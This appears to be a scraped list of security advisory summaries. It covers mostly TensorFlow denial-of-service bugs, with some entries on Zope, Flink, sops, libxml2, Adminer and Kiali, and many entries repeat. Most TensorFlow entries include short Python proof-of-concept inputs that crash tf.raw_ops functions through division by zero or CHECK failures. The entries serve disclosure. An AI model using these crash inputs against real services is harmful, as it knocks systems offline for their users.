An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)
The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …
The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …
The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])
An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)
An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)
An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)
TensorFlow is an end-to-end open source platform for machine learning. The TFLite implementation of hashtable lookup is vulnerable to a division by zero error An attacker can craft a model such that values's first dimension would be 0. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in …
TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul. The division by 0 occurs deep in Eigen code because the b tensor is empty. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and …
Zope Products.CMFCore and Products.PluggableAuthService, as used in Plone and other products, allow Reflected XSS.
Passing a complex argument to tf.transpose at the same time as passing conjugate=True argument results in a crash: import tensorflow as tf tf.transpose(conjugate=True, a=complex(1))
Passing a complex argument to tf.transpose at the same time as passing conjugate=True argument results in a crash: import tensorflow as tf tf.transpose(conjugate=True, a=complex(1))
Passing a complex argument to tf.transpose at the same time as passing conjugate=True argument results in a crash: import tensorflow as tf tf.transpose(conjugate=True, a=complex(1))
An attacker can cause a denial of service via CHECK-fail in tf.strings.substr with invalid arguments: import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,-1]) import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,2])
An attacker can cause a denial of service via CHECK-fail in tf.strings.substr with invalid arguments: import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,-1]) import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,2])
An attacker can cause a denial of service via CHECK-fail in tf.strings.substr with invalid arguments: import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,-1]) import tensorflow as tf tf.strings.substr(input='abc', len=1, pos=[1,2])
A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to …
An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)
An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)
An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)
An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)
An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)
An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)
The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …
The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …
The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat: import tensorflow as tf import numpy as np indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64) indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.zeros([0], dtype=tf.int64) values_2 = tf.zeros([0], dtype=tf.int64) values = [values_1, values_2] shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64) shape_2 = tf.zeros([9], dtype=tf.int64) shapes = [shape_1, …
An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes: import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap: import tensorflow as tf import numpy as np sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64) sparse_values = tf.ones([1], dtype=tf.int64) shape = tf.Variable(tf.ones([55], dtype=tf.int64)) shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64)) tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices, sparse_values=sparse_values, sparse_shape=shape)
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.RFFT: import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
An attacker can cause a denial of service by exploiting a CHECK-failure coming from the implementation of tf.raw_ops.IRFFT: import tensorflow as tf values = [-10.0] * 130 values[0] = -9.999999999999995 inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32) inputs = tf.cast(inputs, dtype=tf.complex64) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length) The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad: import tensorflow as tf gradient_tensor = tf.constant([0.0], shape=[1]) input_tensor = tf.constant([0.0], shape=[1]) input_min = tf.constant([[0.0]], shape=[1, 1]) input_max = tf.constant([[0.0]], shape=[1, 1]) tf.raw_ops.QuantizeAndDequantizeV4Grad( gradients=gradient_tensor, input=input_tensor, input_min=input_min, input_max=input_max, axis=0)
An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)
An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)
An attacker can cause a denial of service by exploiting a CHECK-failure coming from tf.raw_ops.LoadAndRemapMatrix: import tensorflow as tf ckpt_path = tf.constant([], shape=[0], dtype=tf.string) old_tensor_name = tf.constant("") row_remapping = tf.constant([], shape=[0], dtype=tf.int64) col_remapping = tf.constant([1], shape=[1], dtype=tf.int64) initializing_values = tf.constant(1.0) tf.raw_ops.LoadAndRemapMatrix( ckpt_path=ckpt_path, old_tensor_name=old_tensor_name, row_remapping=row_remapping, col_remapping=col_remapping, initializing_values=initializing_values, num_rows=0, num_cols=1)
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder: import tensorflow as tf inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32) sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32) merge_repeated = False tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)
An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )
An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )
An attacker can trigger a denial of service via a CHECK-fail in caused by an integer overflow in constructing a new tensor shape: import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name=None )
Impact Processes using tableflip may encounter hung goroutines in the parent process, after a failed upgrade. The Go runtime has annoying behaviour around setting and clearing O_NONBLOCK: exec.Cmd.Start() ends up calling os.File.Fd() for any file in exec.Cmd.ExtraFiles. os.File.Fd() disables both the use of the runtime poller for the file and clears O_NONBLOCK from the underlying open file descriptor. This can lead to goroutines hanging in a parent process, after at …
OPC Foundation UA .NET Standard and OPC UA .NET Legacy is vulnerable to an uncontrolled recursion, which may allow an attacker to trigger a stack overflow.
OPC Foundation UA .NET Standard and OPC UA .NET Legacy are vulnerable to an uncontrolled recursion, which may allow an attacker to trigger a stack overflow.
Impact Windows users using the sops direct editor option (sops file.yaml) can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As well, this attack will only work when using cmd.exe or the Windows C library SearchPath function. This is …
This affects the package dns-packet It creates buffers with allocUnsafe and does not always fill them before forming network packets. This can expose internal application memory over unencrypted network when querying crafted invalid domain names.
Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
GraphHopper is an open-source Java routing engine. In GrassHopper from version 2.0 and before version 2.4, there is a regular expression injection vulnerability that may lead to Denial of Service. This has been patched in 2.4 and 3.0 See this pull request for the fix: https://github.com/graphhopper/graphhopper/pull/2304
fastify-csrf is an open-source plugin helps developers protect their Fastify server against CSRF attacks.
There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
There is a flaw in the xml entity encoding functionality of libxml2 The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
There is a flaw in the xml entity encoding functionality of libxml2. The most likely impact of this flaw is to application availability, with some potential impact to confidentiality and integrity if an attacker is able to use memory information to further exploit the application.
Impact Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion. Patches The issue is fixed by https://github.com/matrix-org/synapse/pull/9855. Workarounds There are no known workarounds. References n/a For more information If you have any questions or comments about this advisory, email us at security@matrix.org.
Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer to affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a pdo_ extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer to are affected. As a …
A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.
